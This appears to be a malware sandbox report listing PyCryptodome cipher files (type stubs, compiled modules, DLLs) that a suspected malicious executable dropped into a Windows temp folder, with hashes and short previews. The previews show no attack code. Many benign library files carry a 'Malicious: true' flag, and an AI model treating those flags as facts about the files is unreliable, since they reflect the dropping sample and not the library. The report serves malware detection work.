                                                                                                                                            SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                            SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                            SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\ChaCha20_Poly1305.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1107
                                                                                                                                            Entropy (8bit):4.862920256864568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                            MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                            SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                            SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                            SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\DES.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1029
                                                                                                                                            Entropy (8bit):4.895477988326694
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJiiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHYBy:K+1AgGWG6N7XY6JqJejbFoeR4w
                                                                                                                                            MD5:F8300805D96A9983E023F2F7860C6E72
                                                                                                                                            SHA1:C80FDD36709906927D8355E2E937AB89E40A8C7C
                                                                                                                                            SHA-256:BFBAF8AEC79DFC45CB8C26053797A43735A7AACA50AA5504FE080E900A6A38E6
                                                                                                                                            SHA-512:32F47B45D4221E66CE58C49C2564C3DF40416C772C2958C1E374719DE3884945D48128704A18686A5491665B61817E592DC8626592F44064FEFCB649F0F10C71
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......blo

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\DES3.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1101
                                                                                                                                            Entropy (8bit):4.968068738679689
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENbKAI1QJSzJSVJuJSpJQlJSNINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1AgGWG6SGxOkDRJqJejbFoeR4X
                                                                                                                                            MD5:DC89ACAAEBEA0CE851FB522E37EF0ACE
                                                                                                                                            SHA1:0C497C6CD79E70AB8CAB26CE18727FAD20750A59
                                                                                                                                            SHA-256:3B868D2E9A2B41C27FCAC90E4C0DBAE1634F7198720805FF9F450C4C4D7CB57F
                                                                                                                                            SHA-512:99F7DBC1CACB3226D916CD744F9FA64787027DBEB39C500788663559D4DDFA985AD8BCF752ED7FC4F65C0499439E867AF9C9F156729D4E671BE4C32A8D036E70
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode,

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\PKCS1_OAEP.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1218
                                                                                                                                            Entropy (8bit):4.825103390769477
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjQFC19js1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFyw1IttDLteMI5aoJupVjHo
                                                                                                                                            MD5:D684C8F5065F2BE30D78895F52B3D3DE
                                                                                                                                            SHA1:9121E5BF5C9B1D9A4BA6BC83690DAB4181BB784A
                                                                                                                                            SHA-256:6A2570614ACE35D86E25EAB9F2AAAFD351B6B7FF85A9893556FB1A47524E099F
                                                                                                                                            SHA-512:ADF2D2B86EA419A696CFA5C30E274B9B116B7ED8577C64D91C31BEF21EBA8C30F8041ACE0BD134E43F5FC13E152D34554F741809A67A392631C894006685086B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\PKCS1_v1_5.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):710
                                                                                                                                            Entropy (8bit):4.7893819013663546
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1mmNkUgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEjJ:1REq7jspT3ENIAlUH8Myje+wqKozuMEt
                                                                                                                                            MD5:EFF76A3F67661BDE6D9D50BA8E67540F
                                                                                                                                            SHA1:989514DFB3236DC0D122B27B0430619967FEEBBA
                                                                                                                                            SHA-256:49DCC3570B0637BF76AFF4BB389AF7E1388AAD93CBFFBF9A1FEB7A3C12186ADF
                                                                                                                                            SHA-512:7C0D68FC3DEEA336C891632927C4E69EFF397EB4F2449642E8152C3B6B2AF0D077DE023234E3B31D1667AB35460361C79263A4C38C43EC647E188538D38CECBF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Cryptodome.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\Salsa20.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):770
                                                                                                                                            Entropy (8bit):4.753367031924495
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                            MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                            SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                            SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                            SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_ARC4.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11264
                                                                                                                                            Entropy (8bit):4.704418348721006
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:nDzsc9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDj90OcX6gY/7ECFV:Dzs69damqTrpYTst0E5DjPcqgY/79X
                                                                                                                                            MD5:85F144F57905F68ECBF14552BAB2F070
                                                                                                                                            SHA1:83A20193E6229EA09DCCAE8890A74DBDD0A76373
                                                                                                                                            SHA-256:28696C8881D9C9272DE4E54ABE6760CD4C6CB22AD7E3FEABAF6FF313EC9A9EAF
                                                                                                                                            SHA-512:533EB4073594BFE97850DFF7353439BACD4E19539E247EE00D599F3468E162D2D88C5CA32322772538A73706DF9A6DD14553B35F47C686D2E20D915FAB766BDA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d...O..e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_EKSBlowfish.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4838
                                                                                                                                            Entropy (8bit):5.294649870739857
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:OawpXvaWWWa+aj9iivDDMqJBNp91+7moVH4ySS:OaHtjV3JN/1+7mQz
                                                                                                                                            MD5:8348CF2C1AE05C4C709D343A37B3364C
                                                                                                                                            SHA1:578F5EB429548A966FD75A75D97C67A36CE17EA8
                                                                                                                                            SHA-256:2B8B71A702EC673BF7686A2C5AA3CBC56114D492C97175ACDCBA3588E8A88D88
                                                                                                                                            SHA-512:A3008974614EFAA22B87917FC2DF9474D1A7E92CEE30EBF171A38D489A164708A9D843264021B3922ED54A991EF5C3D7D9168386A5131C11A07CDFD0076059CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................~.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z.d...Z.d...Z.d.Z.d.Z...e.d.d...............Z.d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_uintz"Cryptodome.Cipher._raw_eksblowfishaa.... int EKSBlowfish_start_operation(const uint8_t key[],. size_t key_len,. const uint8_t salt[16],. size_t salt_len,. unsigned cost,. unsigned invert,. void **pResult);. int EKSBlowfish_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int EKSBlowfish_decrypt(const void *state,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_EKSBlowfish.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):285
                                                                                                                                            Entropy (8bit):4.915960101562323
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBNHKkHb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQkHzlbgHvIY3YyogmvNZRy/O
                                                                                                                                            MD5:0417C72442B8EC2EF4EF4C6A768824D2
                                                                                                                                            SHA1:64400FA2D484328EAA347A10CF101504D7552CAB
                                                                                                                                            SHA-256:F2130E49C75B0660FCFD28D505BEF95FA392CBC2EF636717F49F855546440706
                                                                                                                                            SHA-512:65B16EB4AADB97C2B6EB52E6DB997AFAAFB4BC16B99DED9BC6956D30BD4373B0EDE496E2C97D63D5DCA6FA53261B446B179D33EED7C2F0AA5D94BC5FE13F2654
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Iterable....from Cryptodome.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_Salsa20.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):4.968532257508093
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JF3rugNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDq4wYH/kcX6G:tF/1nb2mhQtkXHTeZ87VDqyMcqgYvEp
                                                                                                                                            MD5:14A20ED2868F5B3D7DCFEF9363CB1F32
                                                                                                                                            SHA1:C1F2EF94439F42AA39DCDE1075DEFAC8A6029DC6
                                                                                                                                            SHA-256:A072631CD1757D5147B5E403D6A96EF94217568D1DC1AE5C67A1892FBF61409E
                                                                                                                                            SHA-512:33BE8B3733380C3ADFE5D2844819C754FB11FCBC7AA75DA8FBB4D6CEF938E7D3267FBD215B9666DCFA5795D54484360A61DAF193BC75B57C252D44E5F9F0D855
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...P..e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2617
                                                                                                                                            Entropy (8bit):5.449062714374059
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:QIzLMJALqGlllJ9XSBRn1s42Wh9CW50lJ0t17:pzCALqyllJ9Xm1NGJ0L7
                                                                                                                                            MD5:2FF47BC8CBA3868516072C5C38B3A7A2
                                                                                                                                            SHA1:A0EBA656C85BBA550BE43DE5CD2C7EEF28A358E2
                                                                                                                                            SHA-256:0F870D7559929F685F23677AA1A64A69450457A624874267D5F8AA165DCBF6BD
                                                                                                                                            SHA-512:22AFE9E991BE23A4617EC5F0CF59B5128B55810C4DBC648A9870A4DE85D35D5F0C45BA1348F430140146088BF21A71C13000DAE8ABEF90D107822678711AF3E5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d...Z.d.S.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c..................... .....|.|.d.<...t...........t.........................}.|.......................d.d...............r.|.......................t...........................|.|.v.r.t...........d.................|.r.|.d.v.r.t...........|...............d.k.....r.t...........d.................|.d...........|.d.<...np|.d.v.r.t...........|...............d.k.....r.t...........d.................|.d...........|.d.<...n>|.d.k.....r#t...........|...............d.k

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_chacha20.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.061520684813544
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:cdF/1nb2mhQtkXn0t/WS60YYDEbqvdvGyv9lkVcqgYvEMo:e2f6XSZ6XYD5vdvGyv9MgYvEMo
                                                                                                                                            MD5:E2AB7EECFD020CFDEBA6DD3ADD732EB7
                                                                                                                                            SHA1:26975087F7AC8001830CAD4151003DBCABF82126
                                                                                                                                            SHA-256:85BCF0FD811ADE1396E3A93EEEF6BC6B88D5555498BA09C164FAA3092DACDEFF
                                                                                                                                            SHA-512:EB45126A07128E0FA8DC2B687F833BA95BB8703D7BC06E5C34F828EAEF062CFCA56D8A51A73B20DFA771595F6C6D830B659B5C0EB62467C61E95C97C4A73398D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...P..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_cbc.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10530
                                                                                                                                            Entropy (8bit):5.311165184174329
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:p226kvJbQ9XIgEggPI4nx3ZJpSSaCWiHgVt834mGvWcsQAn9rdLt83425pKIn+1g:p3bJsgPI4x3ZzWdU4c7U4QnKej+gpp
                                                                                                                                            MD5:FE487E95713F6F85859B0042A8C72945
                                                                                                                                            SHA1:0BE08041C4EA5E0E70C460E102EFDADA0CB83AA1
                                                                                                                                            SHA-256:6A11B6C893D507FDE9AEB777640F9E97CEF383188AC5B164314433B649132A50
                                                                                                                                            SHA-512:F38D6098BCB60B01FFD6844412C4176B9B10F8A6ECBC5591A884A09DBD8733DD8C7061C65FA61CC975A92B80FEEDDFAA69F914D2B5760465EA19DCD3A0BA157F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.+.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_cbc.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):716
                                                                                                                                            Entropy (8bit):4.751012185181633
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                            MD5:374718D8A7601AFF8E74B7B67F517B38
                                                                                                                                            SHA1:BF6DDE08FEABEA4908869E1790DF38DDAB69CADF
                                                                                                                                            SHA-256:32C4737F3237691DAC8534EA506CD139E17FA709139B07A3CDF3513EBC850DCC
                                                                                                                                            SHA-512:9966959122F804F46CD4A594AB3F6D54B103236AB15BF80D97C63B30AA02CD0E5E2E46ACC9B38B85237CA0E6147020C93A66C069401FA47087BFB29EFE3EB82B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ccm.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25908
                                                                                                                                            Entropy (8bit):5.35972377883601
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Pq/qgU1Xl1wB3ziI4SiI4QuogPD8jLmv4SeWPj7KzPc4eqEu:P5/wJDEI4VPWmvxeG7KYW
                                                                                                                                            MD5:5FCA2BC88DA691D438A5075645D4663E
                                                                                                                                            SHA1:2BD464D92954C7F7F86E48317CBB7BE743A7B5C3
                                                                                                                                            SHA-256:FF96C3125D0A1F1A7E9EBA6D9B2884B0C3C50C256579037DBD72D507EBD4A17A
                                                                                                                                            SHA-512:B2FA9DD1782B6D87B62279891E697CD937AE14E262B38393EC54C7A6A3282DD40779363A5C7FD27679DB58BE9A9F51EAA9415DD35E9F1B04E90C01593C24494D
                                                                                                                                            Malicious:false
